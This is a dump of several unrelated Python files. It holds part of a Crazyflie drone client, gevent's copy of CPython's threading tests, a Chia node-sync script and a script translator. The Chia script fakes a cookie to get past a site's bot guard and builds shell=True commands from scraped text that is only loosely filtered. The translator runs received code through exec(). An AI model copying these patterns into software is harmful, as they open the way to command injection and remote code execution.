"""Callback from the log layer when an error occurs"""
QMessageBox.about(
self, "Example error", "Error when using log config"
" [{0}]: {1}".format(log_conf.name, msg))
def wait_for_position_estimator(self, cf):
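"""Block until the Kalman estimator converges: keep a 10-sample history of
the position variances and wait until (max - min) drops below 0.001 on all
three axes, then switch to the GROUNDED flight mode."""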
logger.info('Waiting for estimator to find stable position...')
self.cfStatus = (
'Waiting for estimator to find stable position... '
'(QTM needs to be connected and providing data)'
)
log_config = LogConfig(name='Kalman Variance', period_in_ms=500)
log_config.add_variable('kalman.varPX', 'float')
log_config.add_variable('kalman.varPY', 'float')
log_config.add_variable('kalman.varPZ', 'float')
var_y_history = [1000] * 10
var_x_history = [1000] * 10
var_z_history = [1000] * 10
threshold = 0.001
with SyncLogger(cf, log_config) as log:
for log_entry in log:
data = log_entry[1]
var_x_history.append(data['kalman.varPX'])
var_x_history.pop(0)
var_y_history.append(data['kalman.varPY'])
var_y_history.pop(0)
var_z_history.append(data['kalman.varPZ'])
var_z_history.pop(0)
min_x = min(var_x_history)
max_x = max(var_x_history)
min_y = min(var_y_history)
max_y = max(var_y_history)
min_z = min(var_z_history)
max_z = max(var_z_history)
# print("{} {} {}".
# format(max_x - min_x, max_y - min_y, max_z - min_z))
if (max_x - min_x) < threshold and (
max_y - min_y) < threshold and (
max_z - min_z) < threshold:
logger.info("Position found with error in, x: {}, y: {}, "
"z: {}".format(max_x - min_x,
max_y - min_y,
max_z - min_z))
self.cfStatus = ": connected"
self.switch_flight_mode(FlightModeStates.GROUNDED)
break
def reset_estimator(self, cf):
# Reset the kalman filter
cf.param.set_value('kalman.resetEstimation', '1')
time.sleep(0.1)
cf.param.set_value('kalman.resetEstimation', '0')
self.wait_for_position_estimator(cf)
def switch_flight_mode(self, mode):
# Handles the behaviour of switching between flight modes
self.flight_mode = mode
# Handle client input control.
# Disable gamepad input if we are not grounded
if self.flight_mode in [
FlightModeStates.GROUNDED,
FlightModeStates.DISCONNECTED,
FlightModeStates.RECORD
]:
self._helper.mainUI.disable_input(False)
else:
self._helper.mainUI.disable_input(True)
self._event.clear()
# Threadsafe call
self._machine.postEvent(FlightModeEvent(mode))
logger.info('Switching Flight Mode to: %s', mode)
def send_setpoint(self, pos):
# Wraps the send command to the crazyflie
if self._cf is not None:
self._cf.commander.send_position_setpoint(pos.x, pos.y, pos.z, 0.0)
class Position:
def __init__(self, x, y, z, roll=0.0, pitch=0.0, yaw=0.0):
self.x = x
self.y = y
self.z = z
self.roll = roll
self.pitch = pitch
self.yaw = yaw
def distance_to(self, other_point):
return math.sqrt(
math.pow(self.x - other_point.x, 2) +
math.pow(self.y - other_point.y, 2) +
math.pow(self.z - other_point.z, 2))
def is_valid(self):
# NaN compares unequal to itself, so this returns False only if x, y or z is NaN
return self.x == self.x and self.y == self.y and self.z == self.z
def __str__(self):
return "x: {} y: {} z: {} Roll: {} Pitch: {} Yaw: {}".format(
self.x, self.y, self.z, self.roll, self.pitch, self.yaw)
|
test_threading.py
|
# Very rudimentary test of threading module
print("GEVENT: Begin import")
import test.test_support
from test.test_support import verbose, cpython_only
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
try:
import _testcapi
except ImportError:
_testcapi = None
except:
# gevent: a distutils.errors.LinkError is sometimes raised.
# It appears that it happens during concurrent test runs;
# some lib_pypy/_testcapimodule.o file is truncated
_testcapi = None
import lock_tests # gevent: use local copy
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegexpMatches(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegexpMatches(repr(t), r'^<TestThread\(.*, \w+ -?\d+\)>$')
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertIsNotNone(ident[0])
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
@test.test_support.cpython_only
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertFalse(t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
@test.test_support.cpython_only
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite from hanging forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, flags=re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
@test.test_support.cpython_only
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, '')
self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getcheckinterval()
# Make the bug more likely to manifest.
sys.setcheckinterval(10)
try:
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
finally:
sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
# stdout is fully buffered because it is not a tty; we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@cpython_only
@unittest.skipIf(_testcapi is None, "need _testcapi module")
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_print_exception(self):
script = r"""if 1:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1.0/0.0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, '')
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if 1:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1.0/0.0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, '')
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if 1:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1.0/0.0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, '')
self.assertNotIn("Unhandled exception", err)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
print("GEVENT: Begin main")
test_main()
|
core.py
|
import os
import random
import requests
import json
import re
import time
import threading
import subprocess
from Utils import ReadConfig
import command
regex_ip = re.compile(r'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
regex_site = re.compile(r'^[0-9a-zA-Z\-]{1,16}\.[0-9a-zA-Z\-]{1,16}\.[0-9a-zA-Z\-]{2,10}$')
def async_run(f, *args, **kwargs):
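# Run f(*args, **kwargs) on a background thread (fire-and-forget).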
td = threading.Thread(target=f, args=args, kwargs=kwargs)
td.start()
def get_nodes():
url = 'https://chia.woele.cc/chia/'
headers = {
'User-Agent': f'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.{random.randint(1000, 9999)}.212 Safari/537.36',
'Cookie': f'guardret=b1GroZYUgZ33{random.randint(10000,99999)}VIyXw=='
}
resp = requests.get(url, headers=headers, timeout=10)
resp.encoding = 'utf-8'
# print(resp.text)
result = re.findall(r'<tbody class="table-hover">(.*?)</tbody>',resp.text,re.S)[0]
# print(result)
nodes = re.findall(r'<td class="text-left">(.*?)</td>', result)
nodes = [i for i in nodes if len(regex_site.findall(i)) > 0 or len(regex_ip.findall(i)) > 0]
with open('nodes.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(nodes))
def connect_nodes(dir, ListWidgetSignal, ):
try:
filename = 'nodes.json'
with open(filename, encoding='utf-8') as f:
nodes = json.loads(f.read())
print(nodes)
ListWidgetSignal(f'Found {len(nodes)} node entries')
def f(cmd, ):
# print(command)
# ListWidgetSignal(command)
print(cmd)
subprocess.call(cmd,shell=True)
# print(res)
for i in nodes:
command = f'{dir}\\resources\\app.asar.unpacked\\daemon\\chia.exe show -a {i}:8444'
async_run(f, command)
ListWidgetSignal(f'Syncing node -> {i}')
time.sleep(1)
except Exception as e:
ListWidgetSignal(f'{e}')
if __name__=='__main__':
config = ReadConfig('node.ini')
print(config)
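# Example node.ini (illustrative only; the exact format depends on Utils.ReadConfig):
# chia_path = C:\Program Files\Chia    # path to the Chia installation (hypothetical value)
# time_interval = 30                   # minutes between refreshes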
while True:
try:
get_nodes()
except Exception as e:
print(f'Failed to get node list, using old list. Error detail --> {e}')
# connect_nodes expects a status callback; print is used here as a stand-in for the GUI signal
connect_nodes(config['chia_path'], print)
time.sleep(int(config['time_interval'])*60)
|
translator.py
|
import re
import threading
def parse_text(session, args):
bytes_list = args[0].split(',')
bytes_array = bytearray([int(i) for i in bytes_list]).decode()
sentences = bytes_array.split('\n')
var_dict = dict()
executable_file = ''
for i in range(3):
try:result_apis = re.findall("^(.*) += *(.*)\('(.*)'\)", sentences[i])[0]
except:break
if result_apis[1] == 'GetModel3D':
model_name = [result_apis[0], result_apis[2]]
elif result_apis[1] == 'GetSimulation':
simulation_name = [result_apis[0], result_apis[2]]
in_block=False
blocks = list()
session.blocks = blocks
for i in range(3,len(sentences)):
sentence = sentences[i]
server_result = re.findall("(\t*)(.*) \((.*)\) {}".format('{'), sentence)
if len(server_result)>0:
in_block = True
sentences_block = ''
current_args = ''
current_sep = server_result[0][0]
if server_result[0][1]==model_name[0]:
current_block = Block('model3D', model_name[1], session, blocks)
elif server_result[0][1]==simulation_name[0]:
current_block = Block('CFD', simulation_name[1],session, blocks)
if len(server_result[0][2].split(','))>0:
current_args = server_result[0][2]
current_block.set_args(current_args)
current_block.return_string = ''
current_block.return_values = ''
continue
if re.search(".*}.*", sentence):
in_block=False
current_block.set_string(sentences_block)
blocks.append(current_block)
index = blocks.index(current_block)
executable_file += current_sep + current_block.return_string + "blocks[{}]({})\n".format(index, current_args)
continue
elif re.search('.*return \((.*)\)',sentence):
current_block.return_values = re.findall('.*return \((.*)\)', sentence)[0]
current_block.return_string = re.findall('.*return \((.*)\)', sentence)[0]+"," + " = "
continue
if in_block:
sentences_block += sentence+'\n'
continue
executable_file += sentence + "\n"
t = threading.Thread(target=run_exec, name='Execute',args=(executable_file,blocks))
t.start()
def run_exec(executable_file, blocks):
blocks = blocks
exec(compile(executable_file, '<string>', 'exec'))
class Block(object):
def __init__(self, server, API, session, blocks_list):
self.server = server
self.API = API
self.session = session
self.blocks_list = blocks_list
self.return_values = None
def set_string(self, string):
self.block_string = string
def set_args(self, args):
self.args = args
def __call__(self, *args):
self.run_thread(*args)
self.flag = True
while self.flag:
import time
time.sleep(5)
pass
return self.return_values
def run_thread(self, *args):
var_dict = dict()
index = self.blocks_list.index(self)
if len(args)>0:
args_name = self.args.split(',')
for i in range(len(args_name)):
if isinstance(args[i], str):
var_dict['{}'.format(args_name[i])] = "'" + args[i] + "'"
else:
var_dict['{}'.format(args_name[i])] = args[i]
var_dict['return_values'] = self.return_values
var_dict['index'] = index
var_dict['receiver'] = 'design'
socket = self.session.__getattribute__('socket_{}'.format(self.server))
socket.send({'execute_block': [self.block_string, var_dict]})
def response_blocks(session, args):
session.blocks[args[0]].return_values = args[1::]
session.blocks[args[0]].flag = False
class Model3DVar(object):
def __init__(self, session, API):
